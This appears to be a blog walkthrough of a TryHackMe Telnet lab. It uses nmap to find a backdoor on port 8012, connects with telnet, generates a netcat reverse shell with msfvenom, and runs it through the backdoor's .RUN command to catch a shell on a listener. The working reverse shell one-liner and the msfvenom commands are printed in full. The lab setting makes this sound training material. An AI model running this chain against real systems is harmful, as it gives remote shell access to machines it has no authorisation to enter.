Network Attack

If this service is running, it is a bright red flag that should be looked into immediately. Telnet does not require credentials. TryHackMe has a paid room that teaches Telnet.

Telnet is an application protocol which allows the use of a telnet client to connect and execute commands on a remote machine that’s hosting a telnet server.

The telnet client will establish a connection with the server. The client will then become a virtual terminal- allowing you to interact with the remote host.

Telnet sends all messages in clear text and has no specific security mechanisms. Telnet has been replaced by SSH in most production environments.

The user connects to the server by using the Telnet protocol. The user then executes commands on the server by using specific Telnet commands in the Telnet prompt. The following command is used to connect to a telnet service:

telnet [ip] [port]

Begin by running reconnaissance on the the target macine:

sudo nmap -A -O -p-

8012/tcp open  unknown
| fingerprint-strings:
|   DNSStatusRequestTCP, DNSVersionBindReqTCP, FourOhFourRequest, GenericLines, GetRequest, HTTPOptions, Help, JavaRMI, Kerberos, LANDesk-RC, LDAPBindReq, LDAPSearchReq, LPDString, NCP, NULL, NotesRPC, RPCCheck, RTSPRequest, SIPOptions, SMBProgNeg, SSLSessionReq, TLSSessionReq, TerminalServer, TerminalServerCookie, WMSRequest, X11Probe, afp, giop, ms-sql-s, oracle-tns:
|_    SKIDY’S BACKDOOR. Type .HELP to view commands

Why SKIDY, why???!!! Connect to it

telnet 8012
Connected to
Escape character is '^]'.
SKIDY'S BACKDOOR. Type .HELP to view commands
ls -- nothing....
.HELP: View commands
.RUN : Execute commands
.EXIT: Exit
.RUN whoami -- nothing....
.RUN ls  -- nothing....
.RUN ping -c 1

# That is me on tun0, the IP from the VPN running.....

We’re going to generate a reverse shell payload using msfvenom. We don’t need tcpdump anymore, so kill it. Let’s set the lport environment variable for convenience (we have set lhost earlier). Then run msfvenom following the syntax in the task description to generate the payload.

export lport=4444msfvenom -p cmd/unix/reverse_netcat lhost=$lhost lport=$lport R

Here is a more generic example to generate a reverse shell payload using msfvenom. This will generate and encode a netcat reverse shell for you.

msfvenom -p cmd/unix/reverse_netcat lhost=[local tun0 ip] lport=4444 R

-p = payload
lhost = our local host IP address (this is your machine’s IP address)
lport = the port to listen on (this is the port on your machine)
R = export the payload in raw format

msfvenom -p cmd/unix/reverse_netcat lhost= lport=4444 R
[-] No platform was selected, choosing Msf::Module::Platform::Unix from the payload
[-] No arch selected, selecting arch: cmd from the payload
No encoder specified, outputting raw payload
Payload size: 93 bytes
mkfifo /tmp/qdfcx; nc 4444 0</tmp/qdfcx | /bin/sh >/tmp/qdfcx 2>&1; rm /tmp/qdfcx

Perfect. We’re nearly there. Now all we need to do is start a netcat listener on our local machine. We do this using:

nc -lvp 4444

That is setting up netcat to listen

Ncat: Version 7.91 ( )
Ncat: Listening on :::4444
Ncat: Listening on

Cool, now go run that last line printed out back in the skidy’s terminal

.RUN mkfifo /tmp/qdfcx; nc 4444 0</tmp/qdfcx | /bin/sh >/tmp/qdfcx 2>&1; rm /tmp/qdfcx

Then it poops in the other terminal!!!!!!

nc -lvp 4444
Ncat: Version 7.91 ( )
Ncat: Listening on :::4444
Ncat: Listening on
Ncat: Connection from
Ncat: Connection from

Leave a Reply

Your email address will not be published. Required fields are marked *